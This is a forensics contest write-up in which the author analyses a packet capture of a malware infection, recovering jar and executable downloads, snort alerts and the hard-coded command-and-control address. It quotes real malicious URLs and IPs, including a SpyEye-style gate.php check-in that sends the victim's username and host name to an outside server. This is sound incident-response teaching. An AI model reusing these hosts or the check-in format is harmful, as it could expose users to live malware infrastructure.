Name: dn1nj4 

Description: 
Forensicscontest.com Puzzle #5
------------------------------------------------

Before diving into the actual packet capture, I wanted to get some ideas about what I was  going to be dealing with.  I began by gathering high-level protocol statistics about the  capture using Wireshark's (http://www.wireshark.org/) command-line interface, tshark,  with the following command:

$ tshark -q -z io,phs -r puzzle5_infected.pcap

===================================================================
Protocol Hierarchy Statistics
Filter: frame

frame                                    frames:303 bytes:188538
  eth                                    frames:303 bytes:188538
    ip                                   frames:303 bytes:188538
      udp                                frames:18 bytes:2060
        dns                              frames:12 bytes:1454
        nbns                             frames:6 bytes:606
      tcp                                frames:285 bytes:186478
        http                             frames:110 bytes:129890
          data-text-lines                frames:6 bytes:4098
        tcp.segments                     frames:4 bytes:1913
          http                           frames:3 bytes:1730
            data-text-lines              frames:1 bytes:136
            media                        frames:2 bytes:1594
          ssl                            frames:1 bytes:183
        ssl                              frames:8 bytes:7008
        data                             frames:1 bytes:317
===================================================================

So traffic-wise, we can expect to see at least DNS, some Netbios traffic, HTTP and SSL.

Second, I wanted to get an idea of all of the host IP addresses involved.  Using  Qosient's argus toolset (http://www.qosient.com/argus/), I generated a binary network  flow dataset with the command: 

$ argus -r puzzle5_infected.pcap -w puzzle5_infected.bin

With the binary argus data in hand, we can generate a list of all the unique IP addresses   present and how many bytes were transferred in each direction using the following  command:

$ racluster -M rmon -nn -c "," -m saddr -r puzzle5_infected.bin -L0 -s saddr sbytes dbytes

Host,OutBytes,InBytes
192.168.23.2,1026,758
192.168.23.129,11139,177399
59.53.91.102,168062,7493
65.55.195.250,6011,1782
212.252.32.20,2060,547
213.155.29.144,240,559

So we are dealing with 2 non-routable IP addresses (192.168.23.x) and 4 external IP  addresses.  With a quick Linux command-line we can pull all of the related whois  information these IP addresses:

$ racluster -M rmon -nn -m saddr -r puzzle5_infected.bin -L0 -s saddr |  egrep -v "192 \.168\.23\." | gawk '{ system("jwhois " $0); }' > all_whois.txt

This command reruns racluster, only outputting the IP addresses.  It then uses grep to  strip out the local IP addresses.  Finally, it uses the Linux command "gawk" to execute  the Linux command "jwhois" against the remaining IP addresses and stores the output in a  text file all_whois.txt.

A quick trip through the all_whois.txt file shows us a Chinese IP, a Microsoft IP, and a  Turkish IP.  The last IP lists "NA" as the country, which is Nambia's country code, but  the address information is listed as "UA," which is the Ukraine.  A quick Google search  for the description field "Datacenter Hosting.UA" confirms the IP range is registered to  Ukraine.

inetnum:      	59.52.0.0 - 59.55.255.255
descr:        	CHINANET Jiangxi province network
country:      	CN

NetRange:   	65.52.0.0 - 65.55.255.255
CIDR:       	65.52.0.0/14
OrgName:    	Microsoft Corp
Country:    	US

inetnum:        212.252.32.0  - 212.252.33.255
netname:        Vital
descr:          Vital Teknoloji
country:        TR

inetnum:        213.155.29.144 - 213.155.29.151
netname:        alexjohnes
descr:          alexjohnes - Taras Zadorojniy
country:        NA
address:        UA,74800, Kahovka ,Voroshilova str. 1, apt. 20
descr:          Datacenter Hosting.UA

Interestingly, the Google search for "Datacenter Hosting.UA" also revealed something  unexpected. MalwareURL.com has a list of 68 different domains serving up malware hosted  by Datacenter Hosting.UA (http://www.malwareurl.com/listing.php?as=AS41665). 

Our original IP address listed by racluster, 213.155.29.144, is also listed on the site  as redirecting to a fake scan page at analytics-google.net.  This could serve as an early  indication as to what we're dealing with.

Knowing that we are dealing with some publicly identified malware sites, I next opted to run the packet capture through snort (http://www.snort.org), with the latest  signatures from Emerging Threats (http://www.emergingthreats.org).  This was accomplished  using the following command to instruct snort to log "fast" alerts to the current  directory using /etc/snort/snort.conf as a configuration file: 

$ snort -A fast -l . -c /etc/snort/snort.conf -r puzzle5_infected.pcap

* Note: I configured snort's "HOME_NET" variable in snort.conf to be "192.168.23.0/24,"  which appears to be the local IP range for Ms. Moneymany's network.  

As a result, Snort generated 4 alerts: 

03/16-17:50:38.500087  [**] [1:2010438:3] ET MALWARE Possible Malicious Applet Access  (justexploit kit) [**] [Classification: A Network Trojan was detected] [P
riority: 1] {TCP} 192.168.23.129:1064 -> 59.53.91.102:80

03/16-17:51:05.397195  [**] [1:2009550:2] ET TROJAN Banker PWS/Infostealer HTTP GET  Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1]
{TCP} 192.168.23.129:1069 -> 212.252.32.20:80

03/16-17:51:05.397195  [**] [1:2010789:3] ET TROJAN SpyEye Bot Checkin [**]  [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.23.129:
1069 -> 212.252.32.20:80

03/16-17:51:05.397195  [**] [1:2002400:21] ET USER_AGENTS Suspicious User Agent  (Microsoft Internet Explorer) [**] [Classification: A Network Trojan was detect
ed] [Priority: 1] {TCP} 192.168.23.129:1069 -> 212.252.32.20:80

Looking at the source ports, 2 connections generated these 4 alert.  Both were port 80  connections.  Chinese IP 59.53.91.102 looks like it might be the source of at least one  of the two malicious java applets and Turkish IP 212.252.32.20 was a malware callback.   It is likely that this is the callback for the downloaded executable, but we'll see.

Next up, chaosreader (http://sourceforge.net/projects/chaosreader/).  Chaosreader is a circa 2004 perl script that attempts to parse and extract packet capture into its component pieces.  It generates logs of activity and an easy to navigate HTML page with information on each session.  To use it, I ran the following command:

$ perl chaosreader0.94 -r puzzle5_infected.pcap

This resulted in the following files: 
getpost.html               session_0004.part_01.html  session_0012.http.raw1     stream_0005.domain.raw2
httplog.text               session_0006.http.html     session_0012.http.raw2     stream_0008.netbios-ns.raw
image.html                 session_0006.http.raw      session_0012.part_01.data  stream_0008.netbios-ns.raw1
index.html                 session_0006.http.raw1     session_0013.snpp.raw      stream_0008.netbios-ns.raw2
index.text                 session_0006.http.raw2     session_0013.snpp.raw1     stream_0009.domain.html
session_0002.http.html     session_0006.part_01.zip   session_0013.snpp.raw2     stream_0009.domain.raw
session_0002.http.raw      session_0007.http.html     session_0015.http.html     stream_0009.domain.raw1
session_0002.http.raw1     session_0007.http.raw      session_0015.http.raw      stream_0009.domain.raw2
session_0002.http.raw2     session_0007.http.raw1     session_0015.http.raw1     stream_0010.netbios-ns.raw
session_0002.part_01.gz    session_0007.http.raw2     session_0015.http.raw2     stream_0010.netbios-ns.raw1
session_0002.part_02.data  session_0007.part_01.zip   session_0015.part_01.html  stream_0010.netbios-ns.raw2
session_0003.https.raw     session_0011.http.html     stream_0001.domain.html    stream_0014.domain.html
session_0003.https.raw1    session_0011.http.raw      stream_0001.domain.raw     stream_0014.domain.raw
session_0003.https.raw2    session_0011.http.raw1     stream_0001.domain.raw1    stream_0014.domain.raw1
session_0004.http.html     session_0011.http.raw2     stream_0001.domain.raw2    stream_0014.domain.raw2
session_0004.http.raw      session_0011.part_01.data  stream_0005.domain.html
session_0004.http.raw1     session_0012.http.html     stream_0005.domain.raw
session_0004.http.raw2     session_0012.http.raw      stream_0005.domain.raw1

Based on the file names, chaosreader identified 14 data streams: http, https, domain and netbios.  These protocols match up with what we were expecting from the original tshark protocol output.  Looking at these lines in the httplog.text file, we can start to address some of the questions in the challenge:

1268758238.473   1186 192.168.23.129 TCP_HIT/200 5573 GET http://59.53.91.102/q.jar - NONE/- application/x-java-archive
1268758238.500   4335 192.168.23.129 TCP_HIT/200 7079 GET http://59.53.91.102/sdfg.jar - NONE/- application/x-java-archive

So the name of the two java archives were q.jar and sdfg.jar.

Next, we can also find in the httplog.text, the following request: 
1268758265.397    248 192.168.23.129 TCP_NEGATIVE_HIT/404 0 GET http://212.252.32.20/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!
1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed - N
ONE/- text/html

But what does that mean?  Some quick Googling for threatexpert and gate.php returned another malwareURL.com page of interest (http://www.malwareurl.com/listing.php?domain=freeways.in).  That page lists the following format for malicious URLs which look suspiciously like the one above: 

/11111/gate.php?guid=USERNAME!COMPUTERNAME!00CD1A40&ver=10084&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

This means Ms. Moneymany's username was ADMINISTRATOR at the time she was compromised and her system name is TICKLABS-LZ.  Based on the above variable called "md5", we also know that the md5 hash of the malicious executable is 5942ba36cf732097479c51986eee91ed.

Given that the httplog.txt generated by chaosreader is chronological, the first entry will be the first request.  In this case, the first entry is: 

1268758218.364   2903 192.168.23.129 TCP_HIT/200 0 GET http://59.53.91.102/true.php - NONE/- text/html;

So now we have the URL, but what was the associated domain?  Well by looking in the "raw" output file from chaosereader we can get a better idea of the session traffic.  Which stream is it?  Grep to the rescue:

$ egrep -l "true.php" *.raw
session_0002.http.raw

The "-l" option on egrep instructs grep to return any filenames matching the regular expression.  In this case, the file of interest is "session_0002.http.raw".  Listing the file contents shows the original request header: 

GET /true.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x
-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.
5.30729)
Accept-Encoding: gzip, deflate
Host: nrtjo.eu
Connection: Keep-Alive

Looking at the "Host" field, we can discern that the original link Ms. Monemany clicked on was actually "hxxp://nrtjo.eu/true.php".

Now, where is that executable? Taking a shot in the dark, I first tried another egrep for the PE header "MZ" with the following command:

$ egrep -l "MZ" *.raw
session_0011.http.raw
session_0012.http.raw

Interesting!  So it looks two different sessions may contain executables.  Listing the contest of these files we see requests for: 

GET //loading.php?spl=javadnw&J050006010 HTTP/1.1
GET //loading.php?spl=javad0 HTTP/1.1

And in both HTTP responses we see: 

Content-Disposition: inline; filename=file.exe

So it's entirely plausible that the same file was actually downloaded twice.  Given past experience with chaosreader, I don't fully trust the session reconstruction algorithms.  So, I switched over to tcpflow (http://www.circlemud.org/~jelson/software/tcpflow/ ) to rebuild the sessions for me. 

$ tcpflow -r puzzle5_infected.pcap
$ ls 
059.053.091.102.00080-192.168.023.129.01061
059.053.091.102.00080-192.168.023.129.01063
059.053.091.102.00080-192.168.023.129.01064
059.053.091.102.00080-192.168.023.129.01065
059.053.091.102.00080-192.168.023.129.01066
059.053.091.102.00080-192.168.023.129.01067
065.055.195.250.00443-192.168.023.129.01062
192.168.023.129.01061-059.053.091.102.00080
192.168.023.129.01062-065.055.195.250.00443
192.168.023.129.01063-059.053.091.02.00080
192.168.023.129.01064-059.053.091.102.00080
192.168.023.129.01065-059.053.091.102.00080
192.168.023.129.01066-059.053.091.102.00080
192.168.023.129.01067-059.053.091.102.00080
192.168.023.129.01068-213.155.029.144.00444
192.168.023.129.01069-212.252.032.020.00080
212.252.032.020.00080-192.168.023.129.01069

As you can see above, tcpflow reconstructed sessions into individual files containing data for each side of each session.  Sessions are tagged by <ip>.<port>-<ip>.<port>.  Searching for the two MZ headers again: 

$ egrep -l MZ *
059.053.091.102.00080-192.168.023.129.01066
059.053.091.102.00080-192.168.023.129.01067

So in two sessions of port 80 response traffic from 59.53.91.102 we find the two PE header strings.  In order to parse out the executables from the HTTP chunked encoding, I've thrown together a quick script called unchunk.pl that will copy out the chunks, reassemble them and write this data to an output file:

$ perl ./unchunk.pl 059.053.091.102.00080-192.168.023.129.01066 file1.exe
$ perl ./unchunk.pl 059.053.091.102.00080-192.168.023.129.01067 file2.exe

Using the Linux -Y´file¡ command, we can verify that the header information is correct: 

$ file *.exe
file1.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
file2.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Running the Linux ´md5sum¡ command on both files resulted in an identical hash, meaning we are only dealing with a single file, downloaded twice.

$ md5sum file*
5942ba36cf732097479c51986eee91ed  file1.exe
5942ba36cf732097479c51986eee91ed  file2.exe

So we see above that our MD5 hash matches that of the earlier URL report.

Next we need to determine the type of packing.  I started by extracting the section names from the executable.  For this, I turned to Python's pefile (http://code.google.com/p/pefile/ ) and the following commands :

$ python
>>> >>> import pefile
>>> >>> pe = pefile.PE('file2.exe')
>>> >>> for section in pe.sections:
...     print section.Name
...
UPX0
UPX1
.rsrc

So this reveals the common UPX packer, housed at http://upx.sourceforge.net/ .  Thankfully, UPX provides the ability to automatically unpack itself:

$ upx -d file1.exe
       File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     82432 <-     68096   82.61%    win32/pe     test.exe
Unpacked 1 file.

Looks like it worked!

Next we'll get the uncompressed md5hash.

$ md5sum file1.exe
0f37839f48f7fc77e6d50e14657fb96e file1.exe

The final quesiton we've been asked to answer is what hard-coded IP address does the file connect to. A simple "strings" on the uncompressed file failed to reveal the IP, so it looks like we'll need to compare DNS response traffic to IP address connections.  Leveraging tcpdump, we can pull from the packet capture all of the ASCII text DNS traffic.  Then, we will parse out only the "A" record responses.  This then becomes a simple problem of text processing, for which I turned again to perl and a quick script I've called dnsmap.pl.  Each of the tcpdump output lines containing DNS ´A¡ record responses will be piped into dnsmap.pl via the Linux gawk command:

$ tcpdump -r puzzle5_infected.pcap -nn -vvv udp and port 53 | egrep " A " | gawk '{ system("perl dnsmap.pl \"" $0 "\""); }'

Domain: nrtjo.eu.               	  Response: 59.53.91.102
Domain: freeways.in.            Response: 208.76.61.100,212.252.32.20,208.76.62.100,208.76.63.100,208.76.60.100

We know from our earlier racluster analysis that there are 4 external IP addresses.  Based on the dnsmap.pl results, 59.53.91.102 and 212.252.32.20 already have resolutions.  If we needed to validate a larger data set, we could simply create a regex from the dnsmap.pl output to use as an exclusion list for our earlier racluster results, as such:

$ racluster -M rmon -nn -m saddr -r puzzle5_infected.bin -L0 -s saddr | egrep -v "59.53.91.102|208.76.61.100|212.252.32.20|208.76.62.100|208.76.63.100|208.76.60.100"
    Host
     65.55.195.250
      192.168.23.2
    192.168.23.129
    213.155.29.144

Removing the two internal 192.168.23.x addresses, we are left with 2 candidate Ips: 65.55.195.250 (Microsoft, US) and 213.155.29.144 (alexjohnes, Ukraine).  While my gut instinct says the 213 is absolutely the bad guy, we need something more concrete.  How about time-sequence analysis?

Whichever IP address is the culprit is supposed to be hard-coded in the malware.  That means the connection could only have happened *after* the file was downloaded.  Using tcpdump we can get the order of connections by pulling out all of the packets with the "Syn" flag set:

$ tcpdump -r puzzle5_infected.pcap -nn -q tcp[13] = 2
reading from file puzzle5_infected.pcap, link-type EN10MB (Ethernet)
17:50:17.701672 IP 192.168.23.129.1061 > 59.53.91.102.80: tcp 0
17:50:21.420447 IP 192.168.23.129.1062 > 65.55.195.250.443: tcp 0
17:50:34.546057 IP 192.168.23.129.1063 > 59.53.91.102.80: tcp 0
17:50:34.841573 IP 192.168.23.129.1064 > 59.53.91.102.80: tcp 0
17:50:34.842707 IP 192.168.23.129.1065 > 59.53.91.102.80: tcp 0
17:50:37.755259 IP 192.168.23.129.1064 > 59.53.91.102.80: tcp 0
17:50:37.755282 IP 192.168.23.129.1065 > 59.53.91.102.80: tcp 0
17:50:48.981429 IP 192.168.23.129.1066 > 59.53.91.102.80: tcp 0
17:50:49.968107 IP 192.168.23.129.1067 > 59.53.91.102.80: tcp 0
17:50:52.942530 IP 192.168.23.129.1067 > 59.53.91.102.80: tcp 0
17:51:01.726678 IP 192.168.23.129.1068 > 213.155.29.144.444: tcp 0
17:51:05.114322 IP 192.168.23.129.1069 > 212.252.32.20.80: tcp 0

Based on the naming convention of our tcpflow output files, the two connections where the executable was downloaded were source port 1066 and 1067.  Thus the only two choices for the hard-coded IP based on time-sequence analysis are 213.155.29.144 and 212.252.32.20.  Crossing referencing these two IPs we identified based on dnsmap.pl, we are left with a single IP: 213.155.29.144.